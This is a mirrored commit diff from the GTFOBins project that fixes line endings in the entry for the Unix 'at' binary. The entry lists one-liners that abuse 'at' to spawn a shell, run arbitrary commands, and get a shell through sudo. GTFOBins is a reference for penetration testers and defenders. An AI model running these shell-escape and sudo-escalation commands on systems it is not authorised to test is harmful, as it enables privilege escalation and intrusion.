mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Fix newlines in at
This commit is contained in:
		@@ -1,14 +1,14 @@
 | 
			
		||||
---
 | 
			
		||||
functions:
 | 
			
		||||
  shell:
 | 
			
		||||
    - code: |
 | 
			
		||||
        echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
 | 
			
		||||
  command:
 | 
			
		||||
    - description: The invocation will be blind, but it is possible to redirect the output to a file in a readable location.
 | 
			
		||||
      code: |
 | 
			
		||||
        COMMAND=id
 | 
			
		||||
        echo "$COMMAND" | at now
 | 
			
		||||
  sudo:
 | 
			
		||||
    - code: |
 | 
			
		||||
        echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null
 | 
			
		||||
---
 | 
			
		||||
---
 | 
			
		||||
functions:
 | 
			
		||||
  shell:
 | 
			
		||||
    - code: |
 | 
			
		||||
        echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
 | 
			
		||||
  command:
 | 
			
		||||
    - description: The invocation will be blind, but it is possible to redirect the output to a file in a readable location.
 | 
			
		||||
      code: |
 | 
			
		||||
        COMMAND=id
 | 
			
		||||
        echo "$COMMAND" | at now
 | 
			
		||||
  sudo:
 | 
			
		||||
    - code: |
 | 
			
		||||
        echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null
 | 
			
		||||
---
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user